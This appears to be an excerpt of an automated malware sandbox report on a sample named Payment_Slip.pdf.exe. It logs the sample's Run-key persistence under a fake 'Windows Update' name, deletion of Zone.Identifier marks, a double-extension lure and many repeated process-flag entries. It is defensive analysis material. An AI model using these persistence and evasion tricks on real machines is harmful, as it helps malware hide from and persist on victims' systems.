                              Source: C:\Users\user\AppData\Roaming\host.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mykksg
                              Source: C:\Users\user\AppData\Roaming\host.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mykksg
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Update
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Update

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Source: C:\Users\user\AppData\Roaming\host.exeFile opened: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe:Zone.Identifier read attributes | delete
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeFile opened: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe:Zone.Identifier read attributes | delete
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: Possible double extension: pdf.exeStatic PE information: Payment_Slip.pdf.exe
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,11_2_0041A8DA
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\host.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Roaming\host.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Roaming\host.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Roaming\host.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Roaming\host.exeProcess information set: NOOPENFILEERRORBOX
